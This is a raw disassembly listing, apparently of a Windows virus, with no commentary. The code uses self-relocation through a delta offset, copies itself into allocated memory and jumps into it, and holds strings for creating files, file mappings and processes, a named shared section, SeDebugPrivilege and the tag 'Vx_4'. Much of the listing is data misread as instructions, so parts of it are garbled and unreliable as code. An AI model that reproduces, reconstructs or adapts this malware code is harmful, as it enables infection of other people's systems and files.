call dword ptr [ebp+103EF2h]
test eax, eax
jz loc_42A534
xchg eax, edi
lea esi, [ebp+101000h]
mov ebp, edi
mov ecx, 0CCAh
sub ebp, 101000h
lea edx, [ebp+101254h]
rep movsd
jmp edx
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+101B4Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+103E72h]
add esp, 20h
test eax, eax
jz loc_42A534
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+103E72h]
test eax, eax
jz loc_42A534
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+103E72h]
push 1000Ah
call dword ptr [ebp+103E72h]
call loc_42A2D3
jmp loc_42A534
; ---------------------------------------------------------------------------
loc_42A2D3: ; CODE XREF: sub_42A17E+14B�p
; sub_42A17E+162�j
push 0
pop ecx
jecxz short locret_42A2E2
push 0Ah
call dword ptr [ebp+103EE6h]
jmp short loc_42A2D3
; ---------------------------------------------------------------------------
locret_42A2E2: ; CODE XREF: sub_42A17E+158�j
retn
; ---------------------------------------------------------------------------
loc_42A2E3: ; CODE XREF: sub_42A17E+8B�j
cmp dword ptr [ebp+103E92h], 0
jz loc_42A534
call near ptr loc_42A2FA+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_42A2FA: ; CODE XREF: sub_42A17E+172�p
add bh, bh
sub_42A17E endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
lea esi, [ebp+1017DEh]
xor ecx, ecx
lea edi, [ebp+103EFAh]
mov cl, 0Eh
xchg eax, ebx
call sub_42A59C
cmp dword ptr [ebp+103F2Eh], 0
jz loc_42A534
mov eax, [ebp+103EFEh]
push dword ptr [eax+1]
pop dword ptr [ebp+103917h]
mov eax, [ebp+103F16h]
push dword ptr [eax+1]
pop dword ptr [ebp+103964h]
mov eax, [ebp+103F02h]
push dword ptr [eax+1]
pop dword ptr [ebp+10396Bh]
cmp dword ptr [ebp+10396Bh], 10000h
jnb loc_42A534
mov ecx, [ebp+103F06h]
jecxz short loc_42A383
push dword ptr [ecx+1]
pop dword ptr [ebp+103978h]
mov ecx, [ebp+103F0Eh]
jecxz short loc_42A383
push dword ptr [ecx+1]
pop dword ptr [ebp+103985h]
loc_42A383: ; CODE XREF: .rsrc:0042A367�j
; .rsrc:0042A378�j
call sub_42A540
lea edi, [ebp+103F84h]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+1015EBh]
mov ecx, 19h
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
lea edx, [ebp+103E30h]
loc_42A3CC: ; CODE XREF: .rsrc:0042A3D5�j
lodsb
mov [edx], ax
stosw
add edx, 2
loop loc_42A3CC
mov edx, esp
push 0
push 7328h
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+103F0Ah]
pop eax
add esp, 40h
push 7328h
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 7328h
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+103F12h]
pop edi
pop ecx
test edi, edi
jz loc_42A534
lea esi, [ebp+101000h]
mov ecx, 0CCAh
mov ebp, edi
rep movsd
sub ebp, 101000h
lea eax, [ebp+10144Ah]
jmp eax
; ---------------------------------------------------------------------------
dw 5450h
dd 0FF6A206Ah, 3F1A95FFh, 0C0850010h, 0E834755Fh, 14Fh
dd 11E8h, 44655300h, 67756265h, 76697250h, 67656C69h, 0E8570065h
dd 550h, 4288B5FFh, 95FF0010h, 103E9Eh, 6295FF57h, 6A00103Eh
dd 0FF026A00h, 103E9295h, 128B900h, 2B970000h, 240C89E1h
dd 95FF5754h, 103ED6h, 0A583F633h, 103F72h, 0FF575400h
dd 103EDA95h, 74C08500h, 0FE834666h, 0FFEE7204h, 6A082474h
dd 0FF2A6A00h, 103ED295h, 74C08500h, 88E893DCh, 33000005h
dd 3AE391C9h, 3F728539h, 32750010h, 24247C81h, 73727363h
dd 0C1812874h, 0EAFh, 56505450h, 53505051h, 3E8A95FFh
dd 0C0850010h, 0FF0F7459h, 8F082474h, 103F7285h, 0FDB5E800h
dd 0FF53FFFFh, 103E6295h, 818EEB00h, 128C4h, 95FF5700h
dd 103E62h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A17E
loc_42A534: ; CODE XREF: sub_42A17E+1F�j
; sub_42A17E+B2�j ...
call dword ptr [ebp+103E62h]
jmp loc_42A0F0
; END OF FUNCTION CHUNK FOR sub_42A17E
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_42A540 proc near ; CODE XREF: .rsrc:loc_42A383�p
; sub_42A55F+2�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
mov eax, esp
push 0
push eax
push 0Ch
mov eax, esp
jmp edx
sub_42A540 endp
; ---------------------------------------------------------------------------
aVx_4 db 'Vx_4',0
db 0
; =============== S U B R O U T I N E =======================================
sub_42A55F proc near ; CODE XREF: sub_42A17E+9�p
xor ecx, ecx
call sub_42A540
lea edx, [ebp+101559h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+103E66h]
add esp, 20h
retn
sub_42A55F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dd 585858h, 3328h, 0E73h, 1, 2 dup(0)
dd 29C0h, 0
; =============== S U B R O U T I N E =======================================
sub_42A59C proc near ; CODE XREF: sub_42A17E+7C�p
; .rsrc:0042A312�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+103E6Eh]
stosd
pop ecx
loc_42A5A7: ; CODE XREF: sub_42A59C+E�j
lodsb
test al, al
jnz short loc_42A5A7
loop sub_42A59C
retn
sub_42A59C endp
; =============== S U B R O U T I N E =======================================
sub_42A5AF proc near ; CODE XREF: sub_42C12D+25�p
; FUNCTION CHUNK AT 0042A639 SIZE 000003C0 BYTES
; FUNCTION CHUNK AT 0042AA09 SIZE 00000027 BYTES
lea edx, [ebp+101985h]
push edx
call dword ptr [ebp+103EC6h]
mov [ebp+104288h], eax
call near ptr loc_42A5DC+1
dec esp
outsd
outsd
imul esi, [ebp+70h], 50h
jb short loc_42A639
jbe short near ptr loc_42A639+2
insb
db 65h, 67h, 65h
push esi
popa
insb
jnz short loc_42A640
inc ecx
loc_42A5DC: ; CODE XREF: sub_42A5AF+13�p
add [eax-1], dl
sub_42A5AF endp ; sp-analysis failed
xchg eax, ebp
outsb
db 3Eh
adc [eax], al
mov [ebp+10428Ch], eax
retn
; ---------------------------------------------------------------------------
db 5Ch ; \
db 42h ; B
db 61h ; a
db 73h ; s
db 65h ; e
db 4Eh ; N
db 61h ; a
db 6Dh ; m
db 65h ; e
db 64h ; d
db 4Fh ; O
db 62h ; b
db 6Ah ; j
db 65h ; e
db 63h ; c
db 74h ; t
db 73h ; s
db 5Ch ; \
db 56h ; V
db 74h ; t
db 53h ; S
db 65h ; e
db 63h ; c
db 74h ; t
db 0
db 6Ch ; l
db 73h ; s
db 74h ; t
db 72h ; r
db 6Ch ; l
db 65h ; e
db 6Eh ; n
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 4Dh ; M
db 61h ; a
db 70h ; p
db 70h ; p
db 69h ; i
db 6Eh ; n
db 67h ; g
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 50h ; P
db 72h ; r
db 6Fh ; o
db 63h ; c
db 65h ; e
db 73h ; s
db 73h ; s
db 41h ; A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A5AF
loc_42A639: ; CODE XREF: sub_42A5AF+1F�j
; sub_42A5AF+21�j
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_42A6A3+2
loc_42A640: ; CODE XREF: sub_42A5AF+2A�j
push edx
db 65h
insd
outsd
jz short loc_42A6AB
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_42A6B6+2
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_42A6C2+3
push esp
outsd
outsd
insb
push 33706C65h
xor dl, [ebx+6Eh]
popa
jo short near ptr loc_42A6E1+1
push 4500746Fh
js short loc_42A6DF
jz short near ptr loc_42A6CB+1
push 64616572h
add [esi+69h], al
insb
db 65h
push esp
imul ebp, [ebp+65h], 79536F54h
jnb short loc_42A700
db 65h
insd
push esp
imul ebp, [ebp+65h], 65724600h
db 65h
dec esp
imul esp, [edx+72h], 797261h
inc edi
db 65h
jz short near ptr loc_42A6E3+6
loc_42A6A3: ; CODE XREF: sub_42A5AF+8F�j
imul ebp, [ebp+41h], 69727474h
loc_42A6AB: ; CODE XREF: sub_42A5AF+95�j
bound esi, [ebp+74h]
db 65h
jnb short loc_42A6F2
add [edi+65h], al
jz short near ptr loc_42A6FB+1
loc_42A6B6: ; CODE XREF: sub_42A5AF+A2�j
imul ebp, [ebp+53h], 657A69h
inc edi
db 65h
jz short loc_42A708
loc_42A6C2: ; CODE XREF: sub_42A5AF+AF�j
imul ebp, [ebp+54h], 656D69h
inc edi
loc_42A6CB: ; CODE XREF: sub_42A5AF+C7�j
db 65h
jz short near ptr loc_42A71A+1
outsd
db 64h
jnz short near ptr loc_42A739+5
db 65h
dec eax
popa
outsb
db 64h
insb
db 65h
inc ecx
add [edi+65h], al
jz short near ptr loc_42A72D+6
loc_42A6DF: ; CODE XREF: sub_42A5AF+C5�j
db 65h
insd
loc_42A6E1: ; CODE XREF: sub_42A5AF+BE�j
jo short near ptr loc_42A727+2
loc_42A6E3: ; CODE XREF: sub_42A5AF+F1�j
imul ebp, [ebp+4Eh], 41656D61h
add [edi+65h], al
jz short near ptr loc_42A741+3
db 65h
insd
loc_42A6F2: ; CODE XREF: sub_42A5AF+FF�j
jo short near ptr loc_42A741+3
popa
jz short near ptr loc_42A75E+1
inc ecx
add [edi+65h], al
loc_42A6FB: ; CODE XREF: sub_42A5AF+105�j
jz short loc_42A753
db 65h
jb short near ptr loc_42A772+1
loc_42A700: ; CODE XREF: sub_42A5AF+DB�j
imul ebp, [edi+6Eh], 74654700h
push esi
loc_42A708: ; CODE XREF: sub_42A5AF+110�j
db 65h
jb short near ptr loc_42A77C+2
imul ebp, [edi+6Eh], 417845h
inc edi
db 65h
jz short near ptr loc_42A76B+1
outsd
insb
jnz short near ptr loc_42A781+6
loc_42A71A: ; CODE XREF: sub_42A5AF:loc_42A6CB�j
db 65h
dec ecx
outsb
outsw
jb short near ptr loc_42A78C+2
popa
jz short near ptr loc_42A78C+1
outsd
outsb
inc ecx
loc_42A727: ; CODE XREF: sub_42A5AF:loc_42A6E1�j
add [edi+ebp*2+61h], cl
db 64h
dec esp
loc_42A72D: ; CODE XREF: sub_42A5AF+12E�j
imul esp, [edx+72h], 41797261h
add [ebp+61h], cl
jo short loc_42A78F
loc_42A739: ; CODE XREF: sub_42A5AF+120�j
imul esp, [ebp+77h], 6946664Fh
insb
loc_42A741: ; CODE XREF: sub_42A5AF+13F�j
; sub_42A5AF:loc_42A6F2�j
add gs:[edi+70h], cl
outs dx, byte ptr gs:[esi]
inc esi
imul ebp, [ebp+4Dh], 69707061h
outsb
db 67h
inc ecx
loc_42A753: ; CODE XREF: sub_42A5AF:loc_42A6FB�j
add [edi+70h], cl
outs dx, byte ptr gs:[esi]
push eax
jb short near ptr loc_42A7C9+1
arpl [ebp+73h], sp
loc_42A75E: ; CODE XREF: sub_42A5AF+146�j
jnb short $+2
push eax
jb short loc_42A7D2
arpl [ebp+73h], sp
jnb short near ptr loc_42A794+7
xor al, [esi+69h]
loc_42A76B: ; CODE XREF: sub_42A5AF+164�j
jb short near ptr loc_42A7DA+6
jz short $+2
push eax
jb short near ptr loc_42A7DA+7
loc_42A772: ; CODE XREF: sub_42A5AF+14E�j
arpl [ebp+73h], sp
jnb short near ptr loc_42A7A9+1
xor cl, [esi+65h]
js short near ptr loc_42A7EC+4
loc_42A77C: ; CODE XREF: sub_42A5AF:loc_42A708�j
add [ebx+65h], dl
jz short near ptr loc_42A7C5+2
loc_42A781: ; CODE XREF: sub_42A5AF+169�j
imul ebp, [ebp+41h], 69727474h
bound esi, [ebp+74h]
loc_42A78C: ; CODE XREF: sub_42A5AF+173�j
; sub_42A5AF+170�j
db 65h
jnb short loc_42A7D0
loc_42A78F: ; CODE XREF: sub_42A5AF+188�j
add [ebx+65h], dl
jz short loc_42A7DA
loc_42A794: ; CODE XREF: sub_42A5AF+1B7�j
imul ebp, [ebp+54h], 656D69h
push ebx
insb
db 65h, 65h
jo short $+4
push ebx
jns short loc_42A818
jz short loc_42A80C
insd
push esp
loc_42A7A9: ; CODE XREF: sub_42A5AF+1C6�j
imul ebp, [ebp+65h], 69466F54h
insb
db 65h
push esp
imul ebp, [ebp+65h], 6D6E5500h
popa
jo short loc_42A813
imul esp, [ebp+77h], 6946664Fh
insb
loc_42A7C5: ; CODE XREF: sub_42A5AF+1D0�j
add gs:[esi+69h], dl
loc_42A7C9: ; CODE XREF: sub_42A5AF+1AA�j
jb short near ptr loc_42A83E+1
jnz short loc_42A82E
insb
inc ecx
insb
loc_42A7D0: ; CODE XREF: sub_42A5AF:loc_42A78C�j
insb
outsd
loc_42A7D2: ; CODE XREF: sub_42A5AF+1B2�j
arpl [eax], ax
push edi
jb short loc_42A840
jz short loc_42A83E
inc esi
loc_42A7DA: ; CODE XREF: sub_42A5AF+1E3�j
; sub_42A5AF:loc_42A76B�j ...
imul ebp, [ebp+0], 6441744Eh
push 75h
jnb short loc_42A85A
push eax
jb short near ptr loc_42A84F+3
jbe short near ptr loc_42A84F+5
insb
loc_42A7EC: ; CODE XREF: sub_42A5AF+1CB�j
db 65h, 67h, 65h
jnb near ptr 0A845h
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_42A83B+1
jb short near ptr loc_42A85F+1
popa
jz short loc_42A863
inc esi
imul ebp, [ebp+0], 7243744Eh
db 65h
popa
jz short loc_42A870
push eax
loc_42A80C: ; CODE XREF: sub_42A5AF+1F6�j
jb short loc_42A87D
arpl [ebp+73h], sp
jnb short $+2
loc_42A813: ; CODE XREF: sub_42A5AF+20C�j
dec esi
jz short near ptr loc_42A856+3
jb short loc_42A87D
loc_42A818: ; CODE XREF: sub_42A5AF+1F4�j
popa
jz short loc_42A880
push eax
jb short loc_42A88D
arpl [ebp+73h], sp
jnb short near ptr loc_42A863+5
js short $+2
dec esi
jz short loc_42A86B
jb short loc_42A88F
popa
jz short near ptr loc_42A88F+3
push ebx
loc_42A82E: ; CODE XREF: sub_42A5AF+21C�j
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
inc ebx
jb short near ptr loc_42A89E+1
popa
loc_42A83B: ; CODE XREF: sub_42A5AF+248�j
jz short loc_42A8A2
push ebp
loc_42A83E: ; CODE XREF: sub_42A5AF+228�j
; sub_42A5AF:loc_42A7C9�j
jnb short near ptr loc_42A8A4+1
loc_42A840: ; CODE XREF: sub_42A5AF+226�j
jb short near ptr loc_42A88F+3
jb short loc_42A8B3
arpl [ebp+73h], sp
jnb short $+2
dec esi
jz short loc_42A899
popa
jo short near ptr loc_42A8A4+1
loc_42A84F: ; CODE XREF: sub_42A5AF+238�j
; sub_42A5AF+23A�j
imul esp, [ebp+77h], 6553664Fh
loc_42A856: ; CODE XREF: sub_42A5AF+265�j
arpl [ecx+ebp*2+6Fh], si
loc_42A85A: ; CODE XREF: sub_42A5AF+235�j
outsb
add [esi+74h], cl
dec edi
loc_42A85F: ; CODE XREF: sub_42A5AF+24A�j
jo short loc_42A8C6
outsb
inc esi
loc_42A863: ; CODE XREF: sub_42A5AF+24D�j
; sub_42A5AF+272�j
imul ebp, [ebp+0], 704F744Eh
loc_42A86B: ; CODE XREF: sub_42A5AF+277�j
outs dx, byte ptr gs:[esi]
push eax
jb short loc_42A8DF
loc_42A870: ; CODE XREF: sub_42A5AF+25A�j
arpl [ebp+73h], sp
jnb short loc_42A8C9
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_42A8CB+1
loc_42A87D: ; CODE XREF: sub_42A5AF:loc_42A80C�j
; sub_42A5AF+267�j
jo short near ptr loc_42A8E3+1
outsb
loc_42A880: ; CODE XREF: sub_42A5AF+26A�j
push ebx
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
push eax
jb short near ptr loc_42A8FB+1
loc_42A88D: ; CODE XREF: sub_42A5AF+26D�j
jz short near ptr loc_42A8F3+1
loc_42A88F: ; CODE XREF: sub_42A5AF+279�j
; sub_42A5AF+27C�j ...
arpl [esi+edx*2+69h], si
jb short loc_42A909
jnz short near ptr loc_42A8F7+1
insb
dec ebp
loc_42A899: ; CODE XREF: sub_42A5AF+29B�j
db 65h
insd
outsd
jb short near ptr loc_42A914+3
loc_42A89E: ; CODE XREF: sub_42A5AF+289�j
add [esi+74h], cl
push ecx
loc_42A8A2: ; CODE XREF: sub_42A5AF:loc_42A83B�j
jnz short loc_42A909
loc_42A8A4: ; CODE XREF: sub_42A5AF:loc_42A83E�j
; sub_42A5AF+29E�j
jb short near ptr loc_42A91E+1
dec ecx
outsb
outsw
jb short near ptr loc_42A918+1
popa
jz short loc_42A918
outsd
outsb
push esp
outsd
loc_42A8B3: ; CODE XREF: sub_42A5AF+293�j
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_42A90F+2
jb short loc_42A925
jz short near ptr loc_42A922+1
push esi
imul esi, [edx+74h], 4D6C6175h
loc_42A8C6: ; CODE XREF: sub_42A5AF:loc_42A85F�j
db 65h
insd
outsd
loc_42A8C9: ; CODE XREF: sub_42A5AF+2C4�j
jb short loc_42A944
loc_42A8CB: ; CODE XREF: sub_42A5AF+2CC�j
add [edx+74h], dl
insb
push ebp
outsb
imul esp, [ebx+6Fh], 74536564h
jb short near ptr loc_42A941+2
outsb
db 67h
push esp
outsd
inc ecx
loc_42A8DF: ; CODE XREF: sub_42A5AF+2BF�j
outsb
jnb short near ptr loc_42A94A+1
push ebx
loc_42A8E3: ; CODE XREF: sub_42A5AF:loc_42A87D�j
jz short loc_42A957
imul ebp, [esi+67h], 41535700h
push ebx
jz short loc_42A950
jb short loc_42A965
jnz short near ptr loc_42A962+1
loc_42A8F3: ; CODE XREF: sub_42A5AF:loc_42A88D�j
add [ebx+6Ch], ah
outsd
loc_42A8F7: ; CODE XREF: sub_42A5AF+2E6�j
jnb short loc_42A95E
jnb short near ptr loc_42A969+1
loc_42A8FB: ; CODE XREF: sub_42A5AF+2DC�j
arpl [ebx+65h], bp
jz short $+2
arpl [edi+6Eh], bp
outsb
arpl gs:[eax+eax+67h], si
loc_42A909: ; CODE XREF: sub_42A5AF+2E4�j
; sub_42A5AF:loc_42A8A2�j
db 65h
jz short near ptr loc_42A973+1
outsd
jnb short near ptr loc_42A981+2
loc_42A90F: ; CODE XREF: sub_42A5AF+309�j
bound edi, [ecx+6Eh]
popa
insd
loc_42A914: ; CODE XREF: sub_42A5AF+2ED�j
add gs:[edx+65h], dh
loc_42A918: ; CODE XREF: sub_42A5AF+2FE�j
; sub_42A5AF+2FB�j
arpl [esi+0], si
jnb short near ptr loc_42A981+1
outsb
loc_42A91E: ; CODE XREF: sub_42A5AF:loc_42A8A4�j
add fs:[ebx+6Fh], dh
loc_42A922: ; CODE XREF: sub_42A5AF+30D�j
arpl [ebx+65h], bp
loc_42A925: ; CODE XREF: sub_42A5AF+30B�j
jz short $+2
dec ecx
outsb
jz short loc_42A990
jb short loc_42A99B
db 65h
jz short loc_42A973
insb
outsd
jnb short near ptr loc_42A998+1
dec eax
popa
outsb
db 64h
insb
add gs:[ecx+6Eh], cl
jz short loc_42A9A4
jb short near ptr loc_42A9AE+1
loc_42A941: ; CODE XREF: sub_42A5AF+329�j
db 65h
jz short loc_42A98B
loc_42A944: ; CODE XREF: sub_42A5AF:loc_42A8C9�j
db 65h
jz short loc_42A98A
outsd
outsb
outsb
loc_42A94A: ; CODE XREF: sub_42A5AF+331�j
arpl gs:[ebp+64h], si
push ebx
loc_42A950: ; CODE XREF: sub_42A5AF+33E�j
jz short near ptr loc_42A9B2+1
jz short loc_42A9B9
add [ecx+6Eh], cl
loc_42A957: ; CODE XREF: sub_42A5AF:loc_42A8E3�j
jz short near ptr loc_42A9BC+2
jb short loc_42A9C9
db 65h
jz short near ptr loc_42A9AB+2
loc_42A95E: ; CODE XREF: sub_42A5AF:loc_42A8F7�j
jo short loc_42A9C5
outsb
inc ecx
loc_42A962: ; CODE XREF: sub_42A5AF+342�j
add [ecx+6Eh], cl
loc_42A965: ; CODE XREF: sub_42A5AF+340�j
jz short near ptr loc_42A9CB+1
jb short loc_42A9D7
loc_42A969: ; CODE XREF: sub_42A5AF+34A�j
db 65h
jz short near ptr loc_42A9BA+1
jo short loc_42A9D3
outsb
push ebp
jb short near ptr loc_42A9DC+2
inc ecx
loc_42A973: ; CODE XREF: sub_42A5AF+37E�j
; sub_42A5AF:loc_42A909�j
add [ecx+6Eh], cl
jz short near ptr loc_42A9DC+1
jb short loc_42A9E8
db 65h
jz short near ptr loc_42A9CE+1
db 65h
popa
db 64h
inc esi
loc_42A981: ; CODE XREF: sub_42A5AF+36C�j
; sub_42A5AF+35E�j
imul ebp, [ebp+0], 41564441h
push eax
loc_42A98A: ; CODE XREF: sub_42A5AF:loc_42A944�j
dec ecx
loc_42A98B: ; CODE XREF: sub_42A5AF:loc_42A941�j
xor esi, [edx]
db 2Eh
inc esp
dec esp
loc_42A990: ; CODE XREF: sub_42A5AF+37A�j
dec esp
add [edx+65h], dl
db 67h
inc ebx
insb
outsd
loc_42A998: ; CODE XREF: sub_42A5AF+383�j
jnb short near ptr loc_42A9FD+2
dec ebx
loc_42A99B: ; CODE XREF: sub_42A5AF+37C�j
db 65h
jns short $+3
push edx
db 65h, 67h
dec edi
jo short loc_42AA09
loc_42A9A4: ; CODE XREF: sub_42A5AF+38E�j
outsb
dec ebx
db 65h
jns short near ptr loc_42A9EC+2
js short loc_42A9EC
loc_42A9AB: ; CODE XREF: sub_42A5AF+3AC�j
add [edx+65h], dl
loc_42A9AE: ; CODE XREF: sub_42A5AF+390�j
db 67h
push ecx
jnz short loc_42AA17
loc_42A9B2: ; CODE XREF: sub_42A5AF:loc_42A950�j
jb short near ptr loc_42AA2C+1
push esi
popa
insb
jnz short near ptr loc_42AA1D+1
loc_42A9B9: ; CODE XREF: sub_42A5AF+3A3�j
inc ebp
loc_42A9BA: ; CODE XREF: sub_42A5AF:loc_42A969�j
js short loc_42A9FD
loc_42A9BC: ; CODE XREF: sub_42A5AF:loc_42A957�j
add [edx+65h], dl
db 67h
push ebx
db 65h
jz short loc_42AA1A
popa
loc_42A9C5: ; CODE XREF: sub_42A5AF:loc_42A95E�j
insb
jnz short near ptr loc_42AA2C+1
inc ebp
loc_42A9C9: ; CODE XREF: sub_42A5AF+3AA�j
js short loc_42AA0C
loc_42A9CB: ; CODE XREF: sub_42A5AF:loc_42A965�j
add [esi+33h], dl
loc_42A9CE: ; CODE XREF: sub_42A5AF+3CB�j
imul byte ptr [edx+2]
push esi
push esi
loc_42A9D3: ; CODE XREF: sub_42A5AF+3BD�j
mov edx, esp
push 1
loc_42A9D7: ; CODE XREF: sub_42A5AF+3B8�j
push edx
push dword ptr [edx+18h]
push esi
loc_42A9DC: ; CODE XREF: sub_42A5AF+3C7�j
; sub_42A5AF+3C1�j
call dword ptr [ebp+10428Ch]
mov eax, esp
push esi
push esi
push esi
push eax
loc_42A9E8: ; CODE XREF: sub_42A5AF+3C9�j
push esi
push dword ptr [eax+18h]
loc_42A9EC: ; CODE XREF: sub_42A5AF+3FA�j
; sub_42A5AF+3F7�j
call dword ptr [ebp+103EFAh]
add esp, 10h
pop esi
retn 8
; END OF FUNCTION CHUNK FOR sub_42A5AF
; ---------------------------------------------------------------------------
db 8Dh ;
db 49h ; I
db 0FBh ; û
db 2Bh ; +
; ---------------------------------------------------------------------------
loc_42A9FD: ; CODE XREF: sub_42A5AF:loc_42A9BA�j
; sub_42A5AF:loc_42A998�j
enter 6851h, 0
; ---------------------------------------------------------------------------
db 0
db 0
db 0E8h ; è
db 8Dh ;
db 4Ch ; L
db 24h ; $
db 3
db 6Ah ; j
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A5AF
loc_42AA09: ; CODE XREF: sub_42A5AF+3F3�j
add [edx+5], ch
loc_42AA0C: ; CODE XREF: sub_42A5AF:loc_42A9C9�j
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
loc_42AA17: ; CODE XREF: sub_42A5AF+401�j
push esp
push 40h
loc_42AA1A: ; CODE XREF: sub_42A5AF+412�j
push ecx
push edx
push ebx
loc_42AA1D: ; CODE XREF: sub_42A5AF+408�j
call dword ptr [ebp+103F22h]
add esp, 0Ch
call dword ptr [ebp+103F2Ah]
loc_42AA2C: ; CODE XREF: sub_42A5AF:loc_42A9B2�j
; sub_42A5AF+417�j
add esp, 8
retn
; END OF FUNCTION CHUNK FOR sub_42A5AF
; ---------------------------------------------------------------------------
db 8Dh ;
db 95h ; •
db 30h ; 0
db 3Eh ; >
db 10h
db 0
db 33h ; 3
db 0C9h ; É
db 6Ah ; j
db 0
db 52h ; R
db 68h ; h
db 30h ; 0
db 0
db 32h ; 2
db 0
db 8Bh ; ‹
db 0C4h ; Ä
db 51h ; Q
db 51h ; Q
db 6Ah ; j
db 40h ; @
db 50h ; P
db 51h ; Q
db 6Ah ; j
db 18h
db 83h ; ƒ
db 0C0h ; À
db 8
db 54h ; T
db 6Ah ; j
db 0Eh
db 50h ; P
db 0FFh
db 95h ; •
db 1Eh
db 3Fh ; ?
db 10h
db 0
db 83h ; ƒ
db 0C4h ; Ä
db 20h
db 33h ; 3
db 0D2h ; Ò
db 85h ; …
db 0C0h ; À
db 0Fh
db 99h ; ™
db 0C2h ; Â
db 0F7h ; ÷
db 0DAh ; Ú
db 58h ; X
db 23h ; #
db 0C2h ; Â
db 0C3h ; Ã
db 57h ; W
db 33h ; 3
db 0FFh
db 0E8h ; è
db 0C1h ; Á
db 0FFh
db 0FFh
db 0FFh
db 0Fh
db 84h ; „
db 0A5h ; ¥
db 0
db 0
db 0
db 50h ; P
db 68h ; h
db 28h ; (
db 73h ; s
db 0
db 0
db 8Bh ; ‹
db 0D4h ; Ô
db 6Ah ; j
db 0
db 8Bh ; ‹
db 0CCh ; Ì
db 6Ah ; j
db 40h ; @
db 68h ; h
db 0
db 0
db 10h
db 0
db 6Ah ; j
db 2
db 52h ; R
db 6Ah ; j
db 0
db 68h ; h
db 28h ; (
db 73h ; s
db 0
db 0
db 6Ah ; j
db 0
db 51h ; Q
db 53h ; S
db 50h ; P
db 0FFh
db 95h ; •
db 12h
db 3Fh ; ?
db 10h
db 0
db 5Fh ; _
db 59h ; Y
db 0FFh
db 95h ; •
db 62h ; b
db 3Eh ; >
db 10h
db 0
db 85h ; …
db 0FFh
db 74h ; t
db 71h ; q
db 8Bh ; ‹
db 8Dh ;
db 90h ;
db 15h
db 10h
db 0
db 0E3h ; ã
db 0Ch
db 8Dh ;
db 95h ; •
db 0
db 10h
db 10h
db 0
db 3
db 0D1h ; Ñ
db 57h ; W
db 53h ; S
db 0FFh
db 0D2h ; Ò
db 8Bh ; ‹
db 85h ; …
db 0FEh ; þ
db 3Eh ; >
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 16h
db 29h ; )
db 0
db 0
db 0E8h ; è
db 2Bh ; +
db 0FFh
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 16h
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 63h ; c
db 29h ; )
db 0
db 0
db 0E8h ; è
db 1Ah
db 0FFh
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 2
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 6Ah ; j
db 29h ; )
db 0
db 0
db 0E8h ; è
db 9
db 0FFh
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 6
db 3Fh ; ?
db 10h
db 0
db 85h ; …
db 0C0h ; À
db 74h ; t
db 20h
db 8Dh ;
db 8Fh ;
db 77h ; w
db 29h ; )
db 0
db 0
db 0E8h ; è
db 0F4h ; ô
db 0FEh ; þ
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 0Eh
db 3Fh ; ?
db 10h
db 0
db 85h ; …
db 0C0h ; À
db 74h ; t
db 0Bh
db 8Dh ;
db 8Fh ;
db 84h ; „
db 29h ; )
db 0
db 0
db 0E8h ; è
db 0DFh ; ß
db 0FEh ; þ
db 0FFh
db 0FFh
db 8Bh ; ‹
db 0C7h ; Ç
db 5Fh ; _
db 0C3h ; Ã
db 55h ; U
db 0E8h ; è
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 101B24h
xor ecx, ecx
lea eax, [ebp+101EAFh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
